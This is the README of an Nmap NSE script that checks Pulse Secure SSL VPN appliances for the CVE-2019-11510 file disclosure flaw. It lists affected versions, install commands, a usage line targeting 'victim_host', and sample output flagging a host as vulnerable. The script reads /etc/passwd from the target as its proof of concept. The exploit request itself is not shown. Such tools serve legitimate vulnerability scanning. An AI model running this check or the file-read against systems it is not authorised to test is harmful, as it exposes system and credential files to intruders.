SUMMARY
-------
Simple NSE script to detect Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. 
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4).


INSTALLATION
------------

$ git clone https://github.com/r00tpgp/http-pulse_ssl_vpn.nse.git
$ cd http-pulse_ssl_vpn.nse/
$ sudo cp http-pulse_ssl_vpn.nse /usr/share/nmap/scripts/

USAGE
-----

$ sudo nmap -n -p 443 --script http-pulse_ssl_vpn -n victim_host

PORT    STATE SERVICE
443/tcp open  https
| http-pulse_ssl_vpn: 
|   VULNERABLE:
|   Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests
|     State: VULNERABLE
|     IDs:  CVE:CVE-2019-11510
|       Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. 
|       This exploit reads /etc/passwd as a proof of concept
|       This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
|           
|     Disclosure date: 2019-04-24
|     References:
|       http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html
|       http://www.securityfocus.com/bid/108073
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510

Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds